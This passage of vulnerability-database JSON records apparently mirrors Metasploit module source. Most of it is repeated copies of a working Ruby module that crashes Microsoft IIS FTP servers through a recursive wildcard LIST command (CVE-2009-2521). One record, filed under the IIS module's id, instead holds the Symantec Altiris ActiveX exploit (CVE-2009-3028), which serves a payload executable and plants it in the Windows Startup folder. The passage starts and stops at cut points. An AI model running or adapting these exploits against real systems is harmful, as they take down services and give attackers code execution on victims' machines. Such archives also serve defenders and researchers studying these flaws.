modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T00:25:51", "differentElements": ["sourceData"], "edition": 104}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-01T04:17:01", "history": [], "viewCount": 136, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-01T04:17:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-01T04:17:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T04:17:01", "differentElements": ["sourceData"], "edition": 105}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-09T07:48:19", "history": [], "viewCount": 136, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-10-09T07:48:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-10-09T07:48:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T07:48:19", "differentElements": ["sourceData"], "edition": 106}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-09T12:01:47", "history": [], "viewCount": 136, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-09T12:01:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-09T12:01:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T12:01:47", "differentElements": ["sourceData"], "edition": 107}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-10T09:55:20", "history": [], "viewCount": 136, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-10-10T09:55:20"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-10T09:55:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-10T09:55:20", "differentElements": ["sourceData"], "edition": 108}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-10T11:54:01", "history": [], "viewCount": 136, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-10T11:54:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-10T11:54:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-10T11:54:01", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 109}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "b3d5f211f6d8e18ec8d9e236ebd21c84", "type": "metasploit", "bulletinFamily": "exploit", "title": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute", "description": "This module allows remote attackers to install and execute arbitrary files on a users file system via AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.\n", "published": "2009-09-09T22:30:01", "modified": "2017-07-24T13:26:21", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3028"], "cvelist": ["CVE-2009-3028"], "lastseen": "2019-10-11T17:57:59", "history": [], "viewCount": 136, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-10T11:54:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-10T11:54:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute',\n 'Description' => %q{\n This module allows remote attackers to install and execute arbitrary files on a users file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'BID', '36346' ],\n [ 'CVE', '2009-3028' ],\n [ 'OSVDB', '57893' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500,\n },\n 'DefaultOptions' =>\n {\n 'HTTP::compression' => 'gzip'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DisclosureDate' => 'Sep 09 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('PATH', [ true, \"The path to place the executable.\", 'C:\\\\\\\\Documents and Settings\\\\\\\\All Users\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\' ]),\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ])\n ])\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n\n payload_url = \"http://\"\n payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n payload_url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/PAYLOAD\"\n\n if (request.uri.match(/PAYLOAD/))\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n print_status(\"Sending payload EXE\")\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n vname = rand_text_alpha(rand(100) + 1)\n exe = rand_text_alpha_upper(rand(5) + 1)\n\n content = %Q|<html>\n<head>\n<script>\ntry {\n var #{vname} = new ActiveXObject('Altiris.AeXNSPkgDL.1');\n #{vname}.DownloadAndInstall(\"#{payload_url}/#{exe}.EXE\", \"#{datastore['PATH']}\\\\\\\\#{exe}.EXE\", \"#{datastore['PATH']}\\\\\\\\#{exe}.EXE\", \"\", \"\");\n} catch( e ) { window.location = 'about:blank' ; }\n</script>\n</head>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n send_response_html(cli, content)\n\n handler(cli)\n\n end\n\nend\n=begin\nC:\\Program Files\\Altiris\\eXpress\\Deployment Web Console\\DSWeb\\utils\\AltirisNSConsole.zip\n\naltiris_deploymentsolution_win_6_9_sp3_server.zip\n\n[id(0x00000007), helpstring(\"method DownloadAndInstall\")]\nvoid DownloadAndInstall(\n [in] BSTR Src,\n [in] BSTR Dest,\n [in] BSTR InstCmdLine,\n [in] BSTR UpgdCmdLine,\n [in] BSTR ProdCode);\n=end\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-11T17:57:59", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 110}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-11T19:52:59", "history": [], "viewCount": 137, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-11T19:52:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-11T19:52:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit 